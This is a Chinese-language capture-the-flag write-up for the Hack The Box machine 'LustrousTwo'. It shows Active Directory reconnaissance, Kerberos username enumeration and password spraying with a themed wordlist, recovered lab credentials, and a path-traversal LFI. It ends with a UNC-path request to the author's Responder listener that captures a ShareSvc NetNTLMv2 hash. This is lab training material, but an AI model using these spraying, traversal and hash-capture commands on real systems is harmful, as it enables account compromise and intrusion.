LustrousTwo
1. User
1.1. Reacon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nmap 10.129.193.58 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 00:18 EDT
Nmap scan report for 10.129.193.58
Host is up (0.12s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49669/tcp open unknown
52398/tcp open unknown
52416/tcp open unknown
52426/tcp open unknown
62896/tcp open unknown
62897/tcp open unknown
64635/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 33.39 seconds
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nmap 10.129.193.58 -p 21,53,80,88,135,139,389,445,464,593,636,3268,3269,3389,598 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 00:22 EDT
Nmap scan report for 10.129.193.58
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 09-06-24 05:20AM <DIR> Development
| 04-14-25 04:44AM <DIR> Homes
| 08-31-24 01:57AM <DIR> HR
| 08-31-24 01:57AM <DIR> IT
| 04-14-25 04:44AM <DIR> ITSEC
| 08-31-24 01:58AM <DIR> Production
|_08-31-24 01:58AM <DIR> SEC
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Negotiate
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-01 04:22:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-29T14:23:23
|_Not valid after: 2026-09-29T14:23:23
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
598/tcp filtered sco-websrvrmg3
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-29T14:23:23
|_Not valid after: 2026-09-29T14:23:23
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-29T14:23:23
|_Not valid after: 2026-09-29T14:23:23
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-29T14:23:23
|_Not valid after: 2026-09-29T14:23:23
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-28T14:32:31
|_Not valid after: 2026-03-30T14:32:31
|_ssl-date: 2025-10-01T04:24:05+00:00; +2s from scanner time.
Service Info: Host: LUS2DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-01T04:23:25
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.49 seconds
1.1.2. Domain
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb 10.129.193.58
SMB 10.129.193.58 445 LUS2DC [*] x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
1.1.3. ftp
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# ftp 10.129.193.58
Connected to 10.129.193.58.
220 Microsoft FTP Service
Name (10.129.193.58:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||55347|)
125 Data connection already open; Transfer starting.
09-06-24 05:20AM <DIR> Development
04-14-25 04:44AM <DIR> Homes
08-31-24 01:57AM <DIR> HR
08-31-24 01:57AM <DIR> IT
04-14-25 04:44AM <DIR> ITSEC
08-31-24 01:58AM <DIR> Production
08-31-24 01:58AM <DIR> SEC
ITSEC 里面有东西
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# cat audit_draft.txt
Audit Report Issue Tracking
[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled
[Open] Weak User Passwords
提示我们用户存在弱口令
Homes 目录下面有很多用户的名字
ftp> ls
229 Entering Extended Passive Mode (|||55391|)
125 Data connection already open; Transfer starting.
09-07-24 12:03AM <DIR> Aaron.Norman
09-07-24 12:03AM <DIR> Adam.Barnes
09-07-24 12:03AM <DIR> Amber.Ward
09-07-24 12:03AM <DIR> Andrea.Smith
09-07-24 12:03AM <DIR> Ann.Lynch
09-07-24 12:03AM <DIR> Callum.Oliver
09-07-24 12:03AM <DIR> Carly.Walker
09-07-24 12:03AM <DIR> Chelsea.Smith
09-07-24 12:03AM <DIR> Chloe.Hammond
09-07-24 12:03AM <DIR> Christopher.Lawson
09-07-24 12:03AM <DIR> Claire.Parry
09-07-24 12:03AM <DIR> Darren.Lewis
09-07-24 12:03AM <DIR> Deborah.Jones
09-07-24 12:03AM <DIR> Dominic.West
09-07-24 12:03AM <DIR> Duncan.Smith
09-07-24 12:03AM <DIR> Elaine.Gallagher
09-07-24 12:03AM <DIR> Eleanor.Gregory
09-07-24 12:03AM <DIR> Emma.Bell
09-07-24 12:03AM <DIR> Francesca.Norman
09-07-24 12:03AM <DIR> Gary.Richards
09-07-24 12:03AM <DIR> Gerard.Ward
09-07-24 12:03AM <DIR> Glenn.Williams
09-07-24 12:03AM <DIR> Graeme.Pritchard
09-07-24 12:03AM <DIR> Harriet.Richardson
09-07-24 12:03AM <DIR> Henry.Connor
09-07-24 12:03AM <DIR> Howard.Robinson
09-07-24 12:03AM <DIR> Jacqueline.Phillips
09-07-24 12:03AM <DIR> Janice.Collier
09-07-24 12:03AM <DIR> Jasmine.Johnson
09-07-24 12:03AM <DIR> Joan.Wall
09-07-24 12:03AM <DIR> Judith.Francis
09-07-24 12:03AM <DIR> Justin.Williams
09-07-24 12:03AM <DIR> Kyle.Hussain
09-07-24 12:03AM <DIR> Kyle.Lloyd
09-07-24 12:03AM <DIR> Lawrence.Bryan
09-07-24 12:03AM <DIR> Leah.Elliott
09-07-24 12:03AM <DIR> Lewis.Khan
09-07-24 12:03AM <DIR> Liam.Wheeler
09-07-24 12:03AM <DIR> Lisa.Begum
09-07-24 12:03AM <DIR> Louis.Phillips
09-07-24 12:03AM <DIR> Lydia.Parker
09-07-24 12:03AM <DIR> Malcolm.Yates
09-07-24 12:03AM <DIR> Marie.Hill
09-07-24 12:03AM <DIR> Martin.Hamilton
09-07-24 12:03AM <DIR> Mathew.Roberts
09-07-24 12:03AM <DIR> Melissa.Thompson
09-07-24 12:03AM <DIR> Nathan.Carter
09-07-24 12:03AM <DIR> Nicola.Clarke
09-07-24 12:03AM <DIR> Nicola.Hall
09-07-24 12:03AM <DIR> Nigel.Lee
09-07-24 12:03AM <DIR> Pamela.Taylor
09-07-24 12:03AM <DIR> Robert.Russell
09-07-24 12:03AM <DIR> Ryan.Davies
09-07-24 12:03AM <DIR> Ryan.Moore
09-07-24 12:03AM <DIR> Ryan.Rowe
09-07-24 12:03AM <DIR> Samantha.Smith
09-07-24 12:03AM <DIR> Sara.Matthews
09-07-24 12:03AM <DIR> ShareSvc
09-07-24 12:03AM <DIR> Sharon.Birch
09-07-24 12:03AM <DIR> Sharon.Evans
09-07-24 12:03AM <DIR> Stacey.Barber
09-07-24 12:03AM <DIR> Stacey.Griffiths
09-07-24 12:03AM <DIR> Stephanie.Baxter
09-07-24 12:03AM <DIR> Stephanie.Davies
09-07-24 12:03AM <DIR> Steven.Sutton
09-07-24 12:03AM <DIR> Susan.Johnson
09-07-24 12:03AM <DIR> Terence.Jordan
09-07-24 12:03AM <DIR> Thomas.Myers
09-07-24 12:03AM <DIR> Tony.Davies
09-07-24 12:03AM <DIR> Victoria.Williams
09-07-24 12:03AM <DIR> Wayne.Taylor
226 Transfer complete
这里可以收集到70个用户名字
1.2. Kerbrute
使用 Kerbrute 枚举出有效的用户
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# kerbrute userenum --dc LUS2DC.Lustrous2.vl -d Lustrous2.vl users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/01/25 - Ronnie Flathers @ropnop
2025/10/01 03:56:21 > Using KDC(s):
2025/10/01 03:56:21 > LUS2DC.Lustrous2.vl:88
2025/10/01 03:56:21 > [+] VALID USERNAME: Callum.Oliver@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Ann.Lynch@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Aaron.Norman@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Amber.Ward@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Carly.Walker@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Adam.Barnes@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Andrea.Smith@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Chelsea.Smith@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Chloe.Hammond@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Christopher.Lawson@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Darren.Lewis@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Dominic.West@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Duncan.Smith@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Claire.Parry@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Elaine.Gallagher@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Deborah.Jones@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Gary.Richards@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Emma.Bell@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Francesca.Norman@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Eleanor.Gregory@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Henry.Connor@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Harriet.Richardson@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Glenn.Williams@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Graeme.Pritchard@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Gerard.Ward@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Howard.Robinson@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Janice.Collier@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Jasmine.Johnson@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Joan.Wall@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Kyle.Lloyd@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Kyle.Hussain@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Judith.Francis@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Justin.Williams@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Lawrence.Bryan@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Liam.Wheeler@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Leah.Elliott@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Lewis.Khan@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Lisa.Begum@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Louis.Phillips@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Marie.Hill@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Martin.Hamilton@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Malcolm.Yates@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Lydia.Parker@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Melissa.Thompson@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Mathew.Roberts@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Nicola.Clarke@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Nicola.Hall@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Nathan.Carter@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Nigel.Lee@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Ryan.Davies@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Pamela.Taylor@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Ryan.Moore@Lustrous2.vl
2025/10/01 03:56:21 > [+] VALID USERNAME: Robert.Russell@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Ryan.Rowe@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Samantha.Smith@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: ShareSvc@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Sara.Matthews@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Sharon.Birch@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Stephanie.Baxter@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Stacey.Griffiths@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Stacey.Barber@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Sharon.Evans@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Stephanie.Davies@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Steven.Sutton@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Susan.Johnson@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Thomas.Myers@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Terence.Jordan@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Tony.Davies@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Wayne.Taylor@Lustrous2.vl
2025/10/01 03:56:22 > [+] VALID USERNAME: Victoria.Williams@Lustrous2.vl
2025/10/01 03:56:22 > Done! Tested 71 usernames (70 valid) in 0.613 seconds
全部是有效的用户
那应该就是非常常见的密码了,不然这个爆破会用特别久
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# while IFS= read -r password; do kerbrute passwordspray --dc LUS2DC.Lustrous2.vl -d Lustrous2.vl users "$password"; done < /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000.txt |grep +
爆破了1000个密码,没有任何结果。
我估计是需要社工字典了
这里我直接叫ai帮我生成了100个密码,因为目前知道的信息很少,只知道它的域名 Lustrous2
lustrous2
Lustrous2
LUSTROUS2
lustrous
Lustrous
LUSTROUS
lustrous123
Lustrous123
lustrous2023
Lustrous2023
lustrous2024
Lustrous2024
lustrous2025
Lustrous2025
lustrous21
Lustrous21
lustrous22
Lustrous22
lustrous!
Lustrous!
lustrous@
Lustrous@
lustrous#
Lustrous#
lustrous$
Lustrous$
lustrous%
Lustrous%
lustrous&
Lustrous&
lustrous*
Lustrous*
lustrous1
Lustrous1
lustrous12
Lustrous12
lustrous2!
Lustrous2!
lustrous2@
Lustrous2@
lustrous2#
Lustrous2#
lustrous01
Lustrous01
lustrous02
Lustrous02
lustrous99
Lustrous99
lustrous00
Lustrous00
lust2
Lust2
lust123
Lust123
lust2023
Lust2023
lust2024
Lust2024
lustrous_2
Lustrous_2
lustrous-2
Lustrous-2
lustrous.2
Lustrous.2
2lustrous
2Lustrous
2LUSTROUS
lustrous2!
Lustrous2!
lustrous2@
Lustrous2@
lustrous2#
Lustrous2#
lustrous2$
Lustrous2$
lustrous20
Lustrous20
lustrous19
Lustrous19
lustrous18
Lustrous18
lustrous17
Lustrous17
lustrous16
Lustrous16
lustrous15
Lustrous15
lustr0us2
Lustr0us2
l0str0us2
L0str0us2
lustru5
Lustru5
lustr0us
Lustr0us
lustrous321
Lustrous321
lustrous234
Lustrous234
lustrous345
Lustrous345
lustrous456
Lustrous456
lustrous789
Lustrous789
lustrous987
Lustrous987
lustrous666
Lustrous666
lustrous777
Lustrous777
lustrous888
Lustrous888
lustrous999
Lustrous999
lustrous111
Lustrous111
admin
admin123
administrator
password
password123
123456
12345678
qwerty
abc123
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# while IFS= read -r password; do kerbrute passwordspray --dc LUS2DC.Lustrous2.vl -d Lustrous2.vl users "$password"; done < passwords.txt |grep +
2025/10/01 06:29:52 > [+] VALID LOGIN: Thomas.Myers@Lustrous2.vl:Lustrous2024
2025/10/01 06:30:21 > [+] VALID LOGIN: Terence.Jordan@Lustrous2.vl:Lustrous2!
2025/10/01 06:30:58 > [+] VALID LOGIN: Terence.Jordan@Lustrous2.vl:Lustrous2!
这里直接获取到了两个用户的凭证
Thomas.Myers@Lustrous2.vl :Lustrous2024
Terence.Jordan@Lustrous2.vl:Lustrous2!
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb LUS2DC.Lustrous2.vl -u Thomas.Myers -p Lustrous2024 -k
SMB LUS2DC.Lustrous2.vl 445 LUS2DC [*] x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB LUS2DC.Lustrous2.vl 445 LUS2DC [+] Lustrous2.vl\Thomas.Myers:Lustrous2024
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb LUS2DC.Lustrous2.vl -u Terence.Jordan -p Lustrous2! -k
SMB LUS2DC.Lustrous2.vl 445 LUS2DC [*] x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB LUS2DC.Lustrous2.vl 445 LUS2DC [+] Lustrous2.vl\Terence.Jordan:Lustrous2!
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# impacket-getTGT Lustrous2.vl/Thomas.Myers:'Lustrous2024' -dc-ip 10.129.193.58
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Thomas.Myers.ccache
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# impacket-getTGT Lustrous2.vl/Terence.Jordan:'Lustrous2!' -dc-ip 10.129.193.58
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Terence.Jordan.ccache
1.3. BloodHound
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# bloodhound-ce-python -c All -u Thomas.Myers -d Lustrous2.vl -ns 10.129.193.58 --zip --ldap-channel-binding -k -no-pass
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: lustrous2.vl
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: lus2dc.lustrous2.vl
INFO: Testing resolved hostname connectivity dead:beef::688b:6562:1ae7:b471
INFO: Trying LDAP connection to dead:beef::688b:6562:1ae7:b471
INFO: Testing resolved hostname connectivity dead:beef::1a6
INFO: Trying LDAP connection to dead:beef::1a6
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: lus2dc.lustrous2.vl
INFO: Testing resolved hostname connectivity dead:beef::688b:6562:1ae7:b471
INFO: Trying LDAP connection to dead:beef::688b:6562:1ae7:b471
INFO: Testing resolved hostname connectivity dead:beef::1a6
INFO: Trying LDAP connection to dead:beef::1a6
INFO: Found 75 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: LUS2DC.Lustrous2.vl
INFO: Done in 00M 14S
INFO: Compressing output into 20251001072816_bloodhound.zip
没有什么东西,只能加一个组,但这个组没有什么出站访问控制
之前有发现存在一个web,但是我一直访问不了。后面看了 0xdf的Wp 才知道原来要进行kerberos身份认证
先配置 krb5.conf
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb LUS2DC.Lustrous2.vl --generate-krb5-file /etc/krb5.conf
SMB 10.129.193.58 445 LUS2DC [*] x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# cat /etc/krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = LUSTROUS2.VL
[realms]
LUSTROUS2.VL = {
kdc = lus2dc.Lustrous2.vl
admin_server = lus2dc.Lustrous2.vl
default_domain = Lustrous2.vl
}
[domain_realm]
.Lustrous2.vl = LUSTROUS2.VL
Lustrous2.vl = LUSTROUS2.VL
然后可以使用 kinit 登录
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# kinit thomas.myers
Password for thomas.myers@LUSTROUS2.VL:
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# klist
Ticket cache: FILE:Thomas.Myers.ccache
Default principal: thomas.myers@LUSTROUS2.VL
Valid starting Expires Service principal
10/01/2025 07:48:32 10/01/2025 17:48:32 krbtgt/LUSTROUS2.VL@LUSTROUS2.VL
renew until 10/02/2025 07:48:23
1.4.1. curl with kerberos
验证一个网站是不是Kerberos认证,最简单的方式就是使用curl加上特定的参数 --negotiate
--negotiate参数的作用是启用 SPNEGO (Security Provider Negotiation Protocol) 认证;他会自动协商最佳的身份认证方法,通常在 Kerberos 和 NTLM 之间选择。当网站启用
kerberos认证时,它会利用我们的TGT向网站HTTP/lus2dc.lustrous2.vl请求一个服务票据,并将其转换为令牌后通过Authentication标头发送。
这里你需要先把票据导入到环境变量才行
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# export KRB5CCNAME=Thomas.Myers.ccache
然后请求网站
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl http://lus2dc.lustrous2.vl --negotiate -I -u :
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRv9tnHvYuO3z1EsFmcl3ZHwPolBurPoW2hIAjUo5z2Kii18H+7xze2l3lnoL8kCGCZbLRZXv2bRv3uaOCp1ZHCvoRjH7uOjOVR2e/VzVzVHVf62MxfJ/Ukitdg1RLiO8yqHLWytQJlr71ipE4ym5eZ
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Wed, 01 Oct 2025 11:57:47 GMT
-I只返回响应头。因为我们只需要根据状态码判断即可-u :将用户名和密码设置为空,表示使用系统认证,即 Kerberos 票据。
但目前还是只能进行Curl访问,想要 在浏览器上访问还要配置 negotiate-auth
1.4.2. firefox 配置 negotiate-auth
- 打开
about:config
- 搜索
network.negotiate,并把你要访问的uris配置到network.negotiate-auth.trusted-uris
- 将
network.negotiate-auth.using-native-gsslib设置为true
配置好后你就可以访问 http://lus2dc.lustrous2.vl/ 了
有一个文件可以下载
文件就是ftp中的那个提示
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl http://lus2dc.lustrous2.vl/File/Download?fileName=audit.txt --negotiate -u : -o audit.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 207 100 207 0 0 1248 0 --:--:-- --:--:-- --:--:-- 1254
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# cat audit.txt
Audit Report Issue Tracking
[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled
[Open] Weak User Passwords
1.5. LFI
然后你可以发现这里存在一个LFI
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl http://lus2dc.lustrous2.vl/File/Download?fileName=../../../../../../../../../Windows/win.ini --negotiate -u :
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
1.6. NetNTLMv2
这里还是参考0xdf的思路,(我确实想不到读什么)
Tip
在大多数情况下,Windows 系统有个便利特性:当尝试读取共享目录中的文件时,系统会自动尝试从该共享位置打开文件。这时候可以尝试使用Responder 工具并让它读取我主机上的文件:
开启 Responder 监听,它会自动在我们的主机445端口开启一个SMB服务器,然后利用LFI远程包含我的SMB服务器上的文件
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl http://lus2dc.lustrous2.vl/File/Download?fileName=//10.10.14.91/exp --negotiate -u :
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.91]
Responder IPv6 [dead:beef:2::1059]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-7HTEQ16GVIN]
Responder Domain Name [W637.LOCAL]
Responder DCE-RPC Port [46925]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.193.58
[SMB] NTLMv2-SSP Username : LUSTROUS2\ShareSvc
